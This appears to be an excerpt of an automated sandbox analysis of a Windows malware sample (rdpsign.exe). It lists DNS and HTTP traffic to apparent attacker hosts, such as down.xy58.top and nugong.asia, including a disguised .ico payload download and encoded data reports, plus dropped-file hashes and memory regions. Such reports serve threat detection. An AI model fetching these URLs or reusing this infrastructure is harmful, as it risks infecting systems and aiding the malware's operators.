    • flag-us
      DNS
      77.88.193.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      77.88.193.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      101.15.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.15.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.21.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.21.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      152.153.13.111.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      152.153.13.111.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      2.2.2.234.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.2.2.234.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      211.112.123.233.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      211.112.123.233.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      down.xy58.top
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      down.xy58.top
      IN A
      Response
      down.xy58.top
      IN CNAME
      down.xy58.top.cdn.dnsv1.com.cn
      down.xy58.top.cdn.dnsv1.com.cn
      IN CNAME
      frnfx6xf.slt.sched.tdnsv8.com
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.196
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.111
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.231.136.87
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
    • flag-us
      DNS
      down.xy58.top
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      down.xy58.top
      IN A
      Response
      down.xy58.top
      IN CNAME
      down.xy58.top.cdn.dnsv1.com.cn
      down.xy58.top.cdn.dnsv1.com.cn
      IN CNAME
      frnfx6xf.slt.sched.tdnsv8.com
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.111
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.231.136.87
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.196
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
    • flag-cn
      GET
      http://down.xy58.top/res/icos/9.ico
      rdpsign.exe
      Remote address:
      221.15.67.145:80
      Request
      GET /res/icos/9.ico HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: down.xy58.top
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 04 Nov 2022 06:04:22 GMT
      Etag: "e00fb9f91bcbbccb56a2455456d2b70a"
      Content-Type: image/vnd.microsoft.icon
      Date: Sat, 07 Oct 2023 17:54:03 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 15586908648096285918
      x-cos-meta-md5: e00fb9f91bcbbccb56a2455456d2b70a
      x-cos-request-id: NjUyMTliM2JfZGUzMTIyMDlfZjg3Zl80NTAxMjJi
      Content-Length: 187798
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 15068315473125540156
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      145.67.15.221.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      145.67.15.221.in-addr.arpa
      IN PTR
      Response
      145.67.15.221.in-addr.arpa
      IN PTR
      hnkdjzadsl
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      8.3.197.209.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.3.197.209.in-addr.arpa
      IN PTR
      Response
      8.3.197.209.in-addr.arpa
      IN PTR
      vip0x008map2sslhwcdnnet
    • flag-us
      DNS
      13.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      13.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      195.98.74.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      195.98.74.40.in-addr.arpa
      IN PTR
      Response
    • 122.189.171.111:443
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip
      tls, http
      b9de8270
      18.3kB
      484.9kB
      359
      357

      HTTP Request

      GET https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip

      HTTP Response

      200
    • 122.189.171.111:80
      http://down.nugong.asia/cfg/cmc/zbcfg_exe.txt
      http
      rdpsign.exe
      19.6kB
      466.1kB
      365
      359

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userchange.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userpq.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/blacklist.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/69f335c8397887d4.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ms.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ps.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/6e3a93a55cea3a23/557a93a3c14e34f52a4c5d41926016b1dd2f3f7d426160b564.zip

      HTTP Response

      200

      HTTP Request

      GET http://nreprot.nugong.asia/report/report_data?data=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

      HTTP Response

      200

      HTTP Request

      GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/zbcfg_exe.txt

      HTTP Response

      200
    • 101.227.134.27:443
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      tls, http
      rdpsign.exe
      1.1kB
      4.4kB
      14
      12

      HTTP Request

      GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php

      HTTP Response

      200
    • 47.246.48.205:80
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      http
      rdpsign.exe
      782 B
      2.2kB
      7
      5

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D

      HTTP Response

      200

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D

      HTTP Response

      200
    • 122.189.171.111:443
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4
      tls, http
      b9de8270
      1.6kB
      1.0kB
      13
      12

      HTTP Request

      GET https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4

      HTTP Response

      200
    • 104.193.88.77:443
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      tls, http
      rdpsign.exe
      1.4kB
      7.1kB
      19
      16

      HTTP Request

      GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json

      HTTP Response

      200
    • 111.13.153.152:80
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      http
      b9de8270
      565 B
      2.0kB
      7
      7

      HTTP Request

      GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D

      HTTP Response

      200
    • 221.15.67.145:80
      http://down.xy58.top/res/icos/9.ico
      http
      rdpsign.exe
      6.8kB
      194.1kB
      145
      144

      HTTP Request

      GET http://down.xy58.top/res/icos/9.ico

      HTTP Response

      200
    • 114.114.114.114:53
      down.nugong.asia
      dns
      b9de8270
      62 B
      392 B
      1
      1

      DNS Request

      down.nugong.asia

      DNS Response


    • 8.8.8.8:53
      158.240.127.40.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      158.240.127.40.in-addr.arpa

    • 8.8.8.8:53
      254.105.26.67.in-addr.arpa
      dns
      72 B
      126 B
      1
      1

      DNS Request

      254.105.26.67.in-addr.arpa

    • 8.8.8.8:53
      114.114.114.114.in-addr.arpa
      dns
      74 B
      106 B
      1
      1

      DNS Request

      114.114.114.114.in-addr.arpa

    • 8.8.8.8:53
      111.171.189.122.in-addr.arpa
      dns
      74 B
      162 B
      1
      1

      DNS Request

      111.171.189.122.in-addr.arpa

    • 8.8.8.8:53
      140.32.126.40.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      140.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      108.211.229.192.in-addr.arpa
      dns
      74 B
      145 B
      1
      1

      DNS Request

      108.211.229.192.in-addr.arpa

    • 8.8.8.8:53
      apps.game.qq.com
      dns
      rdpsign.exe
      62 B
      94 B
      1
      1

      DNS Request

      apps.game.qq.com

      DNS Response

      101.227.134.27
      101.227.134.49

    • 8.8.8.8:53
      ocsp.digicert.cn
      dns
      rdpsign.exe
      62 B
      122 B
      1
      1

      DNS Request

      ocsp.digicert.cn

      DNS Response

      47.246.48.205

    • 8.8.8.8:53
      27.134.227.101.in-addr.arpa
      dns
      73 B
      132 B
      1
      1

      DNS Request

      27.134.227.101.in-addr.arpa

    • 8.8.8.8:53
      205.48.246.47.in-addr.arpa
      dns
      72 B
      143 B
      1
      1

      DNS Request

      205.48.246.47.in-addr.arpa

    • 8.8.8.8:53
      sp1.baidu.com
      dns
      rdpsign.exe
      59 B
      144 B
      1
      1

      DNS Request

      sp1.baidu.com

      DNS Response

      104.193.88.77
      104.193.88.123

    • 8.8.8.8:53
      101.14.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      101.14.18.104.in-addr.arpa

    • 8.8.8.8:53
      ocsp.trust-provider.cn
      dns
      b9de8270
      68 B
      300 B
      1
      1

      DNS Request

      ocsp.trust-provider.cn

      DNS Response


    • 8.8.8.8:53
      77.88.193.104.in-addr.arpa
      dns
      72 B
      126 B
      1
      1

      DNS Request

      77.88.193.104.in-addr.arpa

    • 8.8.8.8:53
      101.15.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      101.15.18.104.in-addr.arpa

    • 8.8.8.8:53
      226.21.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      226.21.18.104.in-addr.arpa

    • 8.8.8.8:53
      152.153.13.111.in-addr.arpa
      dns
      73 B
      138 B
      1
      1

      DNS Request

      152.153.13.111.in-addr.arpa

    • 234.2.2.2:22924
      rdpsign.exe
      138 B
      3
    • 233.123.112.211:36635
      rdpsign.exe
      184 B
      2
    • 8.8.8.8:53
      2.2.2.234.in-addr.arpa
      dns
      68 B
      125 B
      1
      1

      DNS Request

      2.2.2.234.in-addr.arpa

    • 8.8.8.8:53
      211.112.123.233.in-addr.arpa
      dns
      74 B
      131 B
      1
      1

      DNS Request

      211.112.123.233.in-addr.arpa

    • 8.8.8.8:53
      down.xy58.top
      dns
      rdpsign.exe
      118 B
      772 B
      2
      2

      DNS Request

      down.xy58.top

      DNS Request

      down.xy58.top

      DNS Response


      DNS Response


    • 8.8.8.8:53
      145.67.15.221.in-addr.arpa
      dns
      72 B
      99 B
      1
      1

      DNS Request

      145.67.15.221.in-addr.arpa

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      8.3.197.209.in-addr.arpa
      dns
      70 B
      111 B
      1
      1

      DNS Request

      8.3.197.209.in-addr.arpa

    • 8.8.8.8:53
      13.227.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      13.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      195.98.74.40.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      195.98.74.40.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Program Files\rdpsign.exe

      Filesize

      98KB

      MD5

      a85f09a9d65752c5ea50eba8431b87af

      SHA1

      578655a959acb372602b6715e6589ded4ad45032

      SHA256

      8cb8a09b32c56c8e1c7bca6b2ef24c9705fb494ec2ca834256b56ec378c90159

      SHA512

      781acb6bbd7fe53a2c6e80839c4c7168a1f0919df06d296953f7a4f25c891c346041f82f4517941b0c4cac976a91697002e5a441aab012674ced8343fd80dc2d

    • C:\Users\Admin\AppData\Local\Temp\IcoC776.exe

      Filesize

      145KB

      MD5

      d2a1752df6431ac0b448cc8f25d0b3d4

      SHA1

      87afaeb38c8bec3278830a470f94ef39726fb26c

      SHA256

      9f4665e08fbfb72b2317bafa85b9ed9491f7df32dd9d818ca726d6d2ae2d4f35

      SHA512

      8411240eea9dd8b048da8a8023f87a2e3411ab67e8f2961ca5098b9df7ba27a5d2b31e339bb2d122a18880633dac569bbf3b6061619656a2582fe5fb16293688

    • C:\Users\Admin\AppData\Local\Temp\IcoDE1C.tmp

      Filesize

      183KB

      MD5

      e00fb9f91bcbbccb56a2455456d2b70a

      SHA1

      9ad3517db35b63ac08185f395a34980eea5d0840

      SHA256

      07b1a5e314075499de803a074a431ac7376121412b190c1f2deae5976b55403f

      SHA512

      ea3c303976e0ad18a0071c8d16570153ad03f257cc3f5bc59ac3ca3d680a18e714f9711938aa0ebba45532fa4a2b43863f6d210a7ef67ce95d576dd5153cdd20

    • C:\Users\Admin\Desktop\玩传奇请点我.lnk

      Filesize

      1KB

      MD5

      fbde3b58e62193a9ab361622026c866a

      SHA1

      08fb1e1a42bca541bf9eb1c2f139ab824e570247

      SHA256

      d171bf7d203bf38b882776ded1482f7a6ae6fa5de63b5f91c44dee9e291d6369

      SHA512

      64fa8b59523b2e00b78128dca68324c87d769d37cd7f04e21d5c3ed856325b3d2ed88a08e1c1f900a18eba8df8714fe8d099a7b970446eef1330e2ab3ff89377

    • C:\Windows\SysWOW64\b9de8270

      Filesize

      399KB

      MD5

      96e1bdff0b93a2b3b55c270933efcbe5

      SHA1

      3b976d555733d10026c2dfcae146f119ff7d6596

      SHA256

      38f71d47fa8ba9eded1309e2b7930e03ea814eea417f0efc5542e94c523693a4

      SHA512

      917ffe3c482cf62e669ee1190e65441c614edeed7419e624665d80e366f1493099ac6a3560560babac629e15a16d28e26a3fac252af7c9671ac934c2bb36e9f2

    • memory/548-19-0x0000020CE0EB0000-0x0000020CE0F7B000-memory.dmp

      Filesize

      812KB

    • memory/548-68-0x0000020CE1CB0000-0x0000020CE1D67000-memory.dmp

      Filesize

      732KB

    • memory/548-18-0x0000020CDF420000-0x0000020CDF423000-memory.dmp

      Filesize

      12KB

    • memory/548-21-0x0000020CE0EB0000-0x0000020CE0F7B000-memory.dmp

      Filesize

      812KB

    • memory/548-64-0x0000020CDF6F0000-0x0000020CDF6F1000-memory.dmp

      Filesize

      4KB

    • memory/548-22-0x00007FFA247D0000-0x00007FFA247E0000-memory.dmp

      Filesize

      64KB

    • memory/548-69-0x0000020CE1090000-0x0000020CE1091000-memory.dmp

      Filesize

      4KB

    • memory/548-70-0x0000020CE10A0000-0x0000020CE10A1000-memory.dmp

      Filesize

      4KB

    • memory/548-73-0x0000020CE1CB0000-0x0000020CE1D67000-memory.dmp

      Filesize

      732KB

    • memory/548-67-0x0000020CE1080000-0x0000020CE1081000-memory.dmp

      Filesize

      4KB

    • memory/548-60-0x00007FFA247D0000-0x00007FFA247E0000-memory.dmp

      Filesize

      64KB

    • memory/548-66-0x0000020CE10A0000-0x0000020CE10A1000-memory.dmp

      Filesize

      4KB

    • memory/548-62-0x0000020CE0EB0000-0x0000020CE0F7B000-memory.dmp

      Filesize

      812KB

    • memory/548-63-0x0000020CE1090000-0x0000020CE1091000-memory.dmp

      Filesize

      4KB

    • memory/584-27-0x0000022C20A20000-0x0000022C20A48000-memory.dmp

      Filesize

      160KB

    • memory/584-65-0x0000022C20A60000-0x0000022C20A61000-memory.dmp

      Filesize

      4KB

    • memory/584-26-0x0000022C20A60000-0x0000022C20A61000-memory.dmp

      Filesize

      4KB

    • memory/584-24-0x0000022C20A10000-0x0000022C20A13000-memory.dmp

      Filesize

      12KB

    • memory/3172-61-0x0000000002430000-0x0000000002431000-memory.dmp

      Filesize

      4KB

    • memory/3172-47-0x0000000008700000-0x00000000087F7000-memory.dmp

      Filesize

      988KB

    • memory/3172-11-0x0000000002410000-0x0000000002413000-memory.dmp

      Filesize

      12KB

    • memory/3172-13-0x0000000002430000-0x0000000002431000-memory.dmp

      Filesize

      4KB

    • memory/3172-12-0x0000000008700000-0x00000000087F7000-memory.dmp

      Filesize

      988KB

    • memory/3172-10-0x0000000002410000-0x0000000002413000-memory.dmp

      Filesize

      12KB

    • memory/3172-8-0x0000000002410000-0x0000000002413000-memory.dmp

      Filesize

      12KB
